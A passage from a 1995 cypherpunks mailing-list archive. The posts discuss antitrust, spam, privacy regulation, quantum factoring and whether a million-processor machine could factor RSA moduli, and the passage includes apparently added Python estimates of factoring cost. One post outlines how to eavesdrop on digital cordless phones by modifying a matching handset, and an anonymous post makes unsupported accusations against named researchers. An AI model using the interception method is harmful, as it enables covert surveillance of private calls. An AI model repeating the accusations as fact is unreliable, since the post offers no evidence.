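    """Approximate ln(n) for a modulus with this many decimal digits."""
    return decimal_digits * math.log(10)


def ln_from_bits(bits):
    """Approximate ln(n) for a modulus with this many bits."""
    return bits * math.log(2)


def gnfs_log_work(ln_n):
    """Natural log of the heuristic work factor for a modulus n."""
    return GNFS_C * ln_n ** (1.0 / 3.0) * math.log(ln_n) ** (2.0 / 3.0)


def mips_years(ln_n):
    """Work in MIPS-years, scaled from the RSA-129 calibration point."""
    baseline = gnfs_log_work(ln_from_digits(RSA129_DIGITS))
    return RSA129_MIPS_YEARS * math.exp(gnfs_log_work(ln_n) - baseline)


def wall_clock_years(ln_n, processors, mips_per_processor):
    """Elapsed years, assuming the work parallelizes perfectly."""
    return mips_years(ln_n) / (processors * mips_per_processor)


def format_duration(years):
    """Render a duration in the most readable unit."""
    minutes = years * MINUTES_PER_YEAR
    if minutes < 24 * 60:
        return "%.0f minutes" % minutes
    if years < 1:
        return "%.0f days" % (years * 365.25)
    return "%.1e years" % years


def report(processors=1000000, mips_per_processor=100.0):
    """Rows of (label, MIPS-years, wall-clock years) for the sizes in the thread."""
    cases = [
        ("RSA-129 (129 digits)", ln_from_digits(129)),
        ("384-bit modulus", ln_from_bits(384)),
        ("1024-bit modulus", ln_from_bits(1024)),
        ("2048-bit modulus", ln_from_bits(2048)),
        ("700-digit modulus", ln_from_digits(700)),
    ]
    rows = []
    for label, ln_n in cases:
        rows.append((label, mips_years(ln_n),
                     wall_clock_years(ln_n, processors, mips_per_processor)))
    return rows


if __name__ == "__main__":
    # One million processors is the figure discussed in the thread;
    # 100 MIPS each is a constructed value.
    for label, work, years in report():
        print("%-22s %10.2e MIPS-years  %s" % (label, work, format_duration(years)))
```

Under these assumptions the million-processor machine handles RSA-129 in under an hour, while the 1024-bit and larger moduli stay far out of reach, which is the point of the reply quoted in the message.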




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Blake <grafolog@netcom.com>
Date: Wed, 20 Dec 95 20:01:37 PST
To: attila <attila@primenet.com>
Subject: Re: (fwd) Junk email address collection (from a junk emailer)
In-Reply-To: <Pine.BSD.3.91.951220184848.5597E-100000@usr5.primenet.com>
Message-ID: <Pine.SUN.3.91.951220195528.24159H-100000@netcom4>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 20 Dec 1995, attila wrote:


> 	and, coming down on DejaNews just puts the fire out in just one 
>     room of a conflagration. 

	Especially since DejaNews is neither the first, nor the most
	thorough in archiving usenet messages.

	I still want to know who is feeding netcom.shell.* to
	the outside world, so that excite can document every 
	whisper there.



> 	for amusement, I have started to code a simple program which
>     takes a feed from procmail where known spammers are listed and it 

	I want a copy of that program.  



        xan

        jonathon
        grafolog@netcom.com



****************************************************************
	
	Opinions represented are not necessarily mine.

	OTOH, they are not representations of any organization 
	I am affiliated with, either.

	WebPage:	ftp://ftp.netcom.com/gr/graphology/home.html
	
          For a good prime, call 391581 * 2^216193 - 1

**********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@berserk.com>
Date: Wed, 20 Dec 95 11:15:06 PST
To: cypherpunks@toad.com
Subject: CFS and Linux
Message-ID: <199512201915.UAA00215@asylum.berserk.com>
MIME-Version: 1.0
Content-Type: text/plain



Is there anyone out there that has CFS running with Linux ?

It installs fine on BSDi 2.0 but I'm unable to install it 
under Linux, I would appreciate it if some one would help
me out.

 -AJ-



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Date: Wed, 20 Dec 95 12:16:19 PST
To: cypherpunks@toad.com
Subject: The Problem With Blaze And Weinstein
Message-ID: <199512202018.UAA02824@pangaea.ang.ecafe.org>
MIME-Version: 1.0
Content-Type: text/plain


I'm not trying to start a flame war. I'm
sure these people are very smart and have
written lots of good code. I'm sure they're
very nice and never kick their dogs.  I'm
just tired of people defending them as
cypherpunks.

They aren't cypherpunks.

Neither has come out against GAK. They
both carefully avoid committing to any
statement. They want us to think they're
"one of us" but they don't want to be
pinned down because they are double dipping
on both sides of the fence.

Blaze even does "research" on GAK. See
his web page for evidence. Also the TIS
report. The fact that he found a bug in
clipper doesn't change this. It proves
it.  He works for the government, via att.

Weinstein is actively promoting GAK by
working at the company that the government
has chosen to bring it to you now that
att has failed.

WHY IS EVERYONE SO QUICK TO DEFEND THESE
PEOPLE? DO THEY HAVE YOU ALL SO IMPRESSED
WITH THEIR MASTERS DEGREES THAT YOU'RE AFRAID
TO LOOK CLOSELY?

No, I did not post the RSA patch. I wouldn't
touch any of that code with a 5 meter pole.

To the guy who says write code: I've
written plenty of code. Clue: you're probably
running some of it right now.

I'm anonymous because I've seen FIRST HAND
what the att lawyers do to people who
tell the wrong kind of truth.

Want me to be a 'nym. OK.

s/ Bill Gates (he has good lawyers that
can handle att and netscape)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Wed, 20 Dec 95 12:27:29 PST
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: on web standards: sent to Markoff
In-Reply-To: <199512200844.AAA24193@netcom6.netcom.com>
Message-ID: <Pine.BSD.3.91.951220193251.5597F-100000@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



   Markoff is not the best on criticism. write the editor direct.
                       ----------------------------------

   Microsoft particularly does seem to place a death grip on things, but
more industry consortiums are forming and Billy has been required to accept
the heat; Java is one, except Billy always finds a way to subvert the
process. Billy is like Karl Marx' premise: "sign all treaties; break them 
when it is convenient."

   The conundrum is trying to decide "when" a particular company is a 
monopoly by either the classic definition of the Sherman and Clayton Acts 
or an effective monopoly, or "bad" player as defined in the 
Robinson-Patman act. 

    Bill Gates more than satisfies the requirements of defining a monopoly
in Sherman and Clayton with 85% of the desktop locked in and an assault
with "almost" standards on the open-system server market. NT is already
garnering more than 25% of server installations in business --big
business, since it will be "guaranteed" compatible with their desktop 95s. 
The rest of us, stay with the real thing.

    Add to MS' virtually absolute domination of the desktop and its 
impending domination of the commercial servers the fact that MS has 95% 
of the front line office products --WP, Spreadsheet, Database, and mail 
with the last being non-standard to long established rules and you do have a 
problem to be considered. 

    Will the market correct itself?  Very questionable since MS rode to 
its position on IBM's back and capitalized on IBM's failure to recognize 
what they had stumbled into. IBM did not fall by the market rejecting IBM 
--the market exploded with the PC for price and diversity reasons: you 
can not compare direct entry, full screen applications and 
transportability of a PC against a looped, expensive main-frame 
connection, if the boss even approves the cost.

    However, Bill Gates' more serious offense involves the fair trade
provisions of the Robinson-Patman act and the subsequent fine-tuning of
the Federal Trade Commission (FTC) which has its own courts. Bill Gates
has used his operating system dominance to force hardware vendors to ship
MS products on _every_ machine, or pay substantial penalties in rates 2
and 3 times larger for all MS products --cheap only if it is universal. 
Under these conditions, why would they ship OS/2 or UNIX? Add a few more
of his contractual items and Anne Bingaman was correct in charging Bill
with restraint of trade. 

   The real issue in DOJ v. MS was that although Bill complied with a 
consent decree, he _immediately_ found other ways to apply the screw, and 
many of these newer terms are even worse, but more subtle. And, there is 
no question the verbal threats have been significantly worse. To software 
vendors it is the threat of denial of technical information on GUIs and 
APIs, to hardware manufacturers it is threats of economic sanctions, 
including publishing decertification of the platform for various WIN95 
and NT compliant stickers, etc.

    Bill Gates is NOT an ethical businessman. If the fact was that Bill
was able to garner his position from hard work, a better product, and a
well-greased advertising and marketing organization would not justify the
application of the classic Sherman and Clayton anti-trust rules; the
market will either continue to accept them or not. 

    However, Bill has used his position of 85% in OSs not only to dictate 
OS considerations, as bad as they are with DOS nothing more than a boot 
sector virus and Windows a pretty program loader, but he has used this 
position to dominate the applications market by bundling and forcing 
machine integrators to include the MicroSoft applications in return for 
the OEM discount on the operating systems.  

    Preloading the market by those means is _not_ ethical or good
business. Bill Gates _clearly_ violates the FTC provisions on ethical
conduct and restraint of trade by a monopoly or quasi-monopoly position. 
Why were nearly 30 OEMs represented anonymously in "friend of the court"
briefs? --and the first thing Billy's (hired virtually every high end firm
in SF) attorneys did was subpoena the _names_ of the consortium under the
rules of evidence --welcome to the "Kiss of Death." 

    Personally, I think it is time to dismember Bill Gates --give him a
choice of his OS group or his applications group and literally force him
to sell all direct or indirect interest in the one he does not choose,
plus forego any involvement. 

   An example of the "ill" is Gates' clear announcement that _all_ MS
programs would now be geared to direct interface to the internet --again
initially only the Microsoft Network with proprietary standards.  This may
be commendable on the intended results of better integration to the world,
but not in terms of free trade as _everything_ MS does is proprietary, or
they do not release _correct_ API information until they have taken a
commanding lead in the market (witness Compu$erve and the rest on no
access to Win95 --IBM put their network and a button for other networks,
with a working PPP interface in the same folder). 

    Anyone who thinks Bill Gates or Microsoft is a benevolent 800 pound 
gorilla has not paid attention in history classes:

	power corrupts
	    absolute power corrupts absolutely.

	he who fails to heed history,
	    is doomed to repeat it.  (which is mankind's normal path)

    ATTILA




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Wed, 20 Dec 95 17:35:00 PST
To: jpp@software.net (John Pettitt)
Subject: Re: 900mhz digital phones - how much to trust ?
In-Reply-To: <199512202219.OAA26567@software.net>
Message-ID: <9512210134.AA05683@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain


> John Pettitt, jpp@software.net writes:
> 
> 
> What's the current thinking on the security level of 900Mhz digital spread
> spectrum cordless phones? Clearly it's not a basic scanner job but how much
> more equipment is needed to monitor one ?

	The easiest way to do this is to simply buy a similar phone
which has all the required signal processing hardware for that particular
type of spread spectrum and modify it to receive promiscuously and
not transmit while doing so.

	As far as I know, essentially no cordless phones use any kind of
actual secure encryption of the digital bit stream, so all you have to
do is ensure that your shadow phone is primed with the correct spreading
sequence or hopping sequence and is tuned to the right center frequency.
Typically choices for these are very limited (maybe 20 channels) and
modifying the micro firmware in a phone or base unit to search all
possibilities is realistic, especially with the help of an external PC as
controller.

	The digital 900 mhz phones all use different proprietary
modulation schemes, but many of them simply transmit a FSK or BPSK rf 
carrier digitally modulated by the output bitstream of a codec chip
(CVSD or regular u-law PCM) on one of several randomly selected
channels,  perhaps slowly hopping from channel to channel in a fixed
sequence.  Even the phones that use direct sequence spreading are
effectively just transmitting a fast BPSK signal modulated at the chip
rate.   Receivers and signal processing boxes capable of dealing with
this kind of digital modulation are a standard commodity item in the
spook world (made by Condor Systems and Watkins Johnson and the like)
and even sometimes show up on the high tech surplus market (and are
collected by some of us who collect high tech spook hardware as a hobby)
- they are however very expensive compared with simply modifying a
couple of real phones to do the job.

	The digital modulation and "spread spectrum" features of 900 mhz
phones are primarily intended to allow them to share the 902-928 mhz
band with all the other users (other phones, truck tracking systems
short range wireless video cameras and video distribution, various
industrial users, wireless LANs of several types, ham radio operators,
and several other types of unlicensed uncoordinated devices radiating up
to 1 watt of power) without suffering the kind of  interference that
has plagued the older 46/49 mhz FM type.  The FCC in fact requires
some level of spectrum spreading for this purpose but leaves the
actual choice up to the implementor rather than establishing a standard
method.   

	Obviously only a secure form of encryption with randomly  chosen
and wide enough keys would really make intercepting a digital cordless
phone difficult for someone determined to do so, especially if they were
targeting one particular phone.  I believe almost all of the
manufacturers have chickened out in the face of NSA and ITAR and not
even implemented toy encryption with random keys - they are simply
assuming that Joe Sixpack or his 14 year old son won't be able to pick
them up  on a commercially available scanner and that the federal law
banning sale of scanners capable of intercepting digital transmissions
and converting them to analog listenable audio will keep the scanner
companies from marketing such and keep customers from complaining about
nosey neighbors listening to their calls.

	But don't assume that if someone really has some serious reason
to want to intercept one they won't be able to - and it is almost
certain that expensive ($5-$20K) DSP based systems capable of 
intercepting several common types are already for sale to the usual
suspects.

	And finally one should not forget that unless one has an ISDN
line, intercepting calls on regular analog subscriber loops (normal
telephone lines) by virtually undetectable simple alligator clip class
wiretaps or bugs is something that any bright 12 year old can pull off
(and many do before they grow up) - so if you have something to hide you
shouldn't trust the phone at all.

						Dave Emery
						die@die.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 20 Dec 95 18:01:40 PST
To: cypherpunks@toad.com
Subject: Re:  ex encrypted script
Message-ID: <9512210158.AA07882@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Is there a way to encrypt a script yet still allow it to be runnable?  I
>know that the simple answer is to write it in C and compile it but I don't
>have the means of doing that at the moment.  (i.e. there is no compiler on
>the system)

Given your constraints:  no.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 20 Dec 95 18:03:07 PST
To: cypherpunks@toad.com
Subject: Re: The Problem With Blaze And Weinstein
Message-ID: <9512210200.AA07896@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> MIT is practically floating on government subsidies.

Actually, if you discount Lincoln Labs, not really.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Wed, 20 Dec 95 19:10:00 PST
To: "Perry E. Metzger" <perry@piermont.com>
Subject: An Apology to Mr. Merzger
In-Reply-To: <199512202359.SAA29012@jekyll.piermont.com>
Message-ID: <Pine.OSF.3.91.951220210124.8832D-100000@Joyce-Perkins.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain



Perry and members of this list,

I want to publicly apologize to Mr. Metzger. On reviewing the events of the
day, it seems that I misunderstood a post by Perry. It seems that I was 
missing a previous post that was being referenced. As to the 
misunderstood message, I have to now agree with Perry and his response.

Please accept this apology.

Dan
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jyri Kaljundi <jk@jaramillo.digit.ee>
Date: Wed, 20 Dec 95 11:27:32 PST
To: cypherpunks@toad.com
Subject: FTC Privacy Initiative (fwd)
Message-ID: <Pine.SOL.3.91.951220212612.8508E-100000@jaramillo.digit.ee>
MIME-Version: 1.0
Content-Type: text/plain



---------- Forwarded message ----------
Date: Wed, 20 Dec 1995 09:22:11 -0800
From: Internet Marketing Discussion List <internet-marketing@popco.com>
To: internet-marketing@popco.com
Subject: FTC Privacy Initiative

From: Lewis Rose <lewrose@arentfox.com>

        The US Federal Trade Commission has launched a "Privacy Initiative"
to investigate whether the information collected at websites (either that
affirmatively submitted by a visitor via a form or information collected
based upon a visitor's selection of pages at a site to reflect personal
interests) should be the subject of regulation by the FTC.  To get
background on this effort, you may want to read a speech by FTC Commissioner
Varney on Electronic Commerce and Privacy which is available at the FTC's
site under speeches (www.ftc.gov) or the Advertising Law Internet Site
(www.webcom.com/~lewrose/home.html) under speeches.

This week the staff of the FTC established a mailing list to allow
interested parties to discuss the issues surrounding the privacy interests
of consumers visiting web sites.  To subscribe, send the message "subscribe"
(without the quotes) to privacy-request@ftc.gov   I suspect most of the
participants will not represent the internet marketing community and urge
interested members of this list to subscribe and participate.  So far, there
have been only two posts-- one by me yesterday wondering why marketers on
the internet should be treated any differently than marketers using more
traditional media, followed by one post simply asserting that internet
marketing privacy issues are completely different from those raised by
traditional media.

Lew


Lewis Rose                           202-857-6012 (voice)
Arent Fox Kintner Plotkin & Kahn     202-857-6395 (fax)
1050 Connecticut Avenue, NW          lewrose@arentfox.com (email)
Washington DC  20036                 Advertising and Marketing Law
 Advertising Law Internet Site  http://www.webcom.com/~lewrose/home.html
 Net-Lawyers Mailing List:  net-lawyers@lawlib.wuacc.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 20 Dec 95 19:33:08 PST
To: cypherpunks@toad.com
Subject: QCF_dec
Message-ID: <199512210332.WAA11993@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Science, 8 December 1995


   Quantum Computers, Factoring, and Decoherence

   I. L. Chuang, R. Laflamme, P. W. Shor, W. H. Zurek

   [First paragraph] The uniqueness of the prime
   factorization of a positive integer is the Fundamental
   Theorem of Arithmetic. In practice, the determination of
   the prime factors of a given number can be an exceedingly
   difficult problem, even though verification is trivial.
   This asymmetry is the basis for modern cryptography and
   provides secret codes used not only on your own bank card
   but also to transfer diplomatic messages between embassies.


   [Precis] It is known that quantum computers can
   dramatically speed up the task of finding factors of large
   numbers, a problem of practical significance for
   cryptographic applications. Factors of an L-digit number
   can be found in ~L^2 time [compared to ~exp(L^(1/3)) time] by
   a quantum computer, which simultaneously follows all paths
   corresponding to distinct classical inputs, obtaining the
   solution from the coherent quantum interference of the
   alternatives. Here it is shown how the decoherence process
   degrades the interference pattern that emerges from the
   quantum factoring algorithm. For a quantum computer
   performing logical operations, an exponential decay of
   quantum coherence is inevitable. However, even in the
   presence of exponential decoherence, quantum computation
   can be useful as long as a sufficiently low decoherence
   rate can be achieved to allow meaningful results to be
   extracted from the calculation.

   I. L. Chuang, Stanford University.

   R. Laflamme and W. H. Zurek, Los Alamos National Laboratory.

   P. W. Shor, AT&T Bell Labs.

   ----------

   QCF_dec (18 kb)

   Sent with compressed qcf1.jpg of 14 equations and 2 
   figures (31 kb)













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Wed, 20 Dec 95 19:37:24 PST
To: cypherpunks@toad.com
Subject: Re: Surprise telecommunications bill?
In-Reply-To: <2.2b7.32.19951221020731.008be6d4@mail.teleport.com>
Message-ID: <skqBN4_00YUv0FwmVM@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 20-Dec-95 Surprise
telecommunications.. by Alan Olsen@teleport.com 
> While watching the national news (NBC, I think) they mentioned that there
> had been a "surprising agreement on a telecommunications bill".  From the
> sparse description, it sounded pretty nasty. 
>  
> Does anyone have any additional information on this?

Yes, and it's not good. This telecom bill is going to be law real, real soon.

-Declan


---

  DOW JONES NEWS 12-20-95   
  6:29 PM

  WASHINGTON -AP- Negotiators resolved a dispute over media ownership,
removing the last major hurdle to an overhaul of laws governing the nation's
communications industry.   

  Once approved by Congress, the White House pledged to sign the legislation
into law.   

  ''This is an extremely positive development for the U.S. economy, for
individuals and for consumers alike,'' Vice President Al Gore said during
an interview in his office.   

  President Clinton, who had threatened to veto earlier provisions of
the measure, will sign what Gore called ''a centrist bill for the 21st
century.''   






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 20 Dec 95 23:13:26 PST
To: John Young <cypherpunks@toad.com
Subject: QCF_dec
Message-ID: <199512210713.XAA09335@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 20 Dec 95 22:56:02 PST
To: cypherpunks@toad.com
Subject: Digicash and capital adequacy
Message-ID: <Pine.SOL.3.91.951220224506.2806B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain



This came out of a corridor discussion yesterday as to how digicash 
would affect future banking systems:

How does digicash interact with capital adequacy requirements? Should each
digi-dollar issued require a corresponding hunk'o'assets in the customers 
account, or should the bank be able to issue digicash using existing 
rules? Digicash can have a much faster velocity than real cash, so I can 
sort of imagine there being periods where adequacy limits could be exceeded.

What's the panel's view?

Simon
 p.s.
    I got to see the movie "Hackers" while I was sick in bed after WWW 
    IV. The movie was pretty bogus, but the soundtrack was pretty 
    cool. The wonderful movie website had nothing about any soundtrack 
    albums; anyone know if there was one?
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Wed, 20 Dec 95 21:21:54 PST
To: cypherpunks@toad.com
Subject: Re: The Problem With Blaze And Weinstein
In-Reply-To: <199512210112.BAA05503@pangaea.ang.ecafe.org>
Message-ID: <951220.231202.6s3.rnr.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hey, "Bill Gates"...

I agree completely that the both you and Dr. Frederic B. Cohen are of
equal value in your contributions to the cypherpunks list.

alpha.c2.org offers 'nym accounts for free.  PLEASE get and use one, so
I can put you in my killfile, next to Dr. Frederic B. Cohen.
- -- 
Roy M. Silvernail --  roy@cybrspc.mn.org
           "I used to be disgusted, but now I'm just amused."
            -- from an old T-shirt(ca. 1975), not an Elvis Costello lyric

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNjtZhvikii9febJAQEDMQP/fTurXMuhXRaNZYRicFOwMebofxkWgYqc
DSa1HlzovcEJLlsxcpZ8J35VrW/q/pdPJhrl0if/kdA1euO4+H/riG44tuwRT70e
kZ7jRMxj3bRRT5HyVhaRsiDmN4COOORfuD9sTzqiGNNrTAS7CVZC2UOU6wSWBIrG
cCoER8/HBEw=
=TVG/
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 20 Dec 95 21:54:35 PST
To: cypherpunks@toad.com
Subject: Re: What ever happened to... Cray Comp/NSA co-development
Message-ID: <acfe321c01021004d5c5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Anitro wrote:

>O.K. Just a factor of 16 increase over the CM architecture right? Not knowing
>the computational capabilities of the individual processors, it might be
>difficult to say what the machine is capable of. Wouldn't that have some
>bearing?

Not in cracking "truly large" problems by brute force. Even if each of the
million processors is capable of 100 MIPS (which is unlikely, given the PIM
approach and the fine-granularity, few-bit-or-less word size, etc.), this
is only 10^8 MIPS. For problems that (for instance) 10^75 machines would
have to spend 10^10 years on, not even a drop in an ocean.

The point is that no existing machines are going to make a dent in these
calculations, though algorithmic cleverness _might_ make factoring much
easier (personally, I doubt it).


>> Second, there was work on a "processor-in-memory" architecture, in
>> conjunction with a Bowie, Maryland spook-connected company. Perhaps this is
>> what you are thinking of?
>
>I didn't mention a 'processor-in-memory' architecture and neither did the NYT
>article. Don't know about any other company involvement, just CCC and NSA.

I wrote my response before seeing the other response someone else (Thaddeus
J. Beier) gave the name of the company. Thad's details match what I recall
about this Bowie company. The archives should have articles on this, dating
back about a year or so ago. As I recall, someone on the list knew people
working at the Supercomputer Research outfit.


>> Third, all avenues of continued funding having fallen through, Cray
>> Computer (not Cray Research, of course) was shut down and assets
>> liquidated. I haven't heard what's become of Seymour, though. (He is
>> undoubtedly an asset, but I doubt the Agency would have him liquidated.)
>
>You mean the avenues that are of PUBLIC record. The possibility could always
>exist that the development continues 'in-house'. It wouldn't be the first time
>that sort of move has been played.

You, whoever you are, asked about the operational status of Cray Computer,
and I answered. It entered Chapter Seven liquidation, parts of existing
computers were sold for scrap or museum/curio objects, the GaAs fab was
sold to another company, and the employees scattered. Claiming the NSA
moved it "in-house" is implausible, at least in terms of these events.

>> Huh? First, what evidence do you have for this claim? Second, who cares?
>> Implementing Clipper in a Cray Computer machine--why bother?
>
>[Rant mode on]
>Speculation Tim... I'm SPECULATING. Could, in theory... AND my kind of theory
>probably has holes you could drive a FLEET of Mack trucks through. I have NO
>evidence. I'm not sure WHO would care. I'M A PARANOID DELUSIONAL PSYCHOPATH!
>O.K. well maybe not that last part... but I'm asking the questions, remember?
>I said I'm new here, so if you're going to blow holes in my pet theories, then
>do me the 'kindness' of using an accurate weapon... that's why I posted...

I asked what evidence you have for this claim. Idle speculation, based on
innumerate estimates of plausibility, is helpful to no one.

>> As to the claim that a million-processor machine could do this, you need to
>> work out the math. (If a backdoor exists, or the LEAF has been gotten, a
>> supercomputer is not needed....)
>
>Again... I claimed NOTHING! SPECULATED MUCH! Now it's your turn... Why would
>YOU build a machine like this? What could POSSIBLY be its capabilities?
>Speculate with me for a moment... *_take a chance_*.

On our list, and in the circles I am familiar with, "speculations" are not
treated with more respect than are actual "claims" (whatever they are). If
you speculate that "really, really fast computers" will make today's
ciphers insecure, based on not even the simplest of calculations, expect to
be either ignored or called to task. This is the way science works, by
falsification of theories (and speculations).

>> If you mean using supercomputers to brute force the general factoring of an
>> RSA modulus, this is nonsense. While there may be math shortcuts we don't
>> yet publicly know about which make factoring easier than we currently
>> think it is, a mere million or even a billion processors will not make a
>> dent in the factoring of, say, a 700-digit modulus. See the tables in
>> Schneier and elsewhere for some estimates of factoring efforts needed.
>
>Nonsense? Is that 700 decimal digits or 700 binary digits? I don't have the
>tables that you refer to. Where may I find them? (LOL)

A 2048-bit key, such as many of us use, uses a roughly 700-decimal-digit
modulus. "Schneier," mentioned in my paragraph, is "Applied Cryptography."
Page 284 of the 1st Ed. has a discussion of the work involved in factoring
large moduli. Rivest has made some more detailed estimates.

Given your rudeness and self-professed ignorance of even the basic math, I
see no point in wasting any more of my time on your posts.

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

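The "work out the math" point in the message above, carried through as an added example (not part of the original post or the thread). It assumes the heuristic running time of the general number field sieve with the o(1) term dropped and counts one machine instruction per elementary operation; the thread cites Schneier's tables without naming an algorithm, and all function names here are hypothetical.

```python
"""Crude factoring-effort estimate for a massively parallel machine.

Assumptions (this example's, not the thread's):
  * cost model is the GNFS heuristic L_n[1/3, (64/9)^(1/3)], o(1) ignored
  * one instruction = one elementary operation, perfect parallel speedup
"""
import math

SECONDS_PER_YEAR = 365.25 * 24 * 3600


def ln_from_bits(bits: float) -> float:
    """Natural log of a modulus of the given size in bits."""
    return bits * math.log(2)


def ln_from_digits(digits: float) -> float:
    """Natural log of a modulus of the given size in decimal digits."""
    return digits * math.log(10)


def gnfs_log2_ops(ln_n: float) -> float:
    """log2 of exp(c * (ln n)^(1/3) * (ln ln n)^(2/3)), c = (64/9)^(1/3)."""
    c = (64.0 / 9.0) ** (1.0 / 3.0)
    ln_ops = c * ln_n ** (1.0 / 3.0) * math.log(ln_n) ** (2.0 / 3.0)
    return ln_ops / math.log(2)


def machine_log2_ops_per_year(processors: int, mips_each: float) -> float:
    """log2 of the instructions the whole machine executes in one year."""
    return math.log2(processors * mips_each * 1e6 * SECONDS_PER_YEAR)


def years_to_factor(ln_n: float, processors: int, mips_each: float) -> float:
    """Years the machine needs for one factorization under the model."""
    gap = gnfs_log2_ops(ln_n) - machine_log2_ops_per_year(processors, mips_each)
    return 2.0 ** gap


def largest_modulus_bits(processors: int, mips_each: float,
                         years: float = 1.0) -> int:
    """Largest modulus size (bits) whose modelled cost fits in the budget."""
    budget = machine_log2_ops_per_year(processors, mips_each) + math.log2(years)
    lo, hi = 64, 1 << 16
    while lo < hi:  # cost grows with size, so binary search is valid
        mid = (lo + hi + 1) // 2
        if gnfs_log2_ops(ln_from_bits(mid)) <= budget:
            lo = mid
        else:
            hi = mid - 1
    return lo


if __name__ == "__main__":
    # The machine discussed in the post: a million processors at 100 MIPS.
    procs, mips = 10**6, 100
    for label, ln_n in (("2048-bit modulus", ln_from_bits(2048)),
                        ("700-digit modulus", ln_from_digits(700))):
        print(f"{label}: ~2^{gnfs_log2_ops(ln_n):.1f} operations, "
              f"~{years_to_factor(ln_n, procs, mips):.1e} years")
    print("largest modulus in one year, 10^6 processors:",
          largest_modulus_bits(procs, mips), "bits")
    print("largest modulus in one year, 10^9 processors:",
          largest_modulus_bits(10**9, mips), "bits")
```

Because the cost is sub-exponential but still grows steeply, multiplying the processor count by a thousand moves the reachable modulus size by only a couple of hundred bits in this model.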





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@darkwing.uoregon.edu>
Date: Wed, 20 Dec 95 23:24:01 PST
To: cypherpunks@toad.com
Subject: the problem with attacks on Blaze & Weinstein
Message-ID: <199512210723.XAA25191@darkwing.uoregon.edu>
MIME-Version: 1.0
Content-Type: text/plain



The "Blaze & Weinstein are devils in disguise" business is ridiculous, as is
the notion of "cypherpunk purity". Cypherpunks is a mailing list. If Blaze
and Weinstein were up to something especially tricky, they'd probably post
from accounts not traceable to their employers (like, say, anonymous
remailers). Suggesting that a person is not to be trusted because they work
for organization "X" is particularly silly where the suggestor isn't willing
to provide the details of their own organizational ties.

This is a mailing list. Mailing lists are for discussing things - like
technological defenses for privacy. People may have interesting things to
contribute because of, in spite of, or irrespective of their employment or
other relationships with large organizations. (And, in fact, they do. Both
Matt Blaze and Jeff Weinstein have done and said pro-privacy things despite
the equivocal-to-hostile stance their employers have taken with respect to
privacy. Brian Davis, the list's token prosecutor :), has recently been
sending messages re the limits of governmental power in the context of
criminal investigations. Microsoft employees have posted re Microsoft's
choices about privacy and encryption/security. And so on.) If this were a
secret organization and we were splitting up into individual cells for
revolutionary/forbidden activity, your suspicion/paranoia might be useful.
But we're not (it's an open list, archived on full-text searchable Web
servers), so it's not.

And, apart from whether or not they're valuable list contributors, the list
really isn't in a position to not "tolerate" unwanted or unproductive
readers or authors. The tools which make identity difficult to fix make it
difficult to restrict/deny access to an unpopular or unwanted identity. Get
used to it. Adapt or die, hmm? 

--
"The anchored mind screwed into me by the psycho-  | Greg Broiles
lubricious thrust of heaven is the one that thinks | gbroiles@netbox.com
every temptation, every desire, every inhibition." | 
	-- Antonin Artaud		   	   | 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Wed, 20 Dec 95 20:34:57 PST
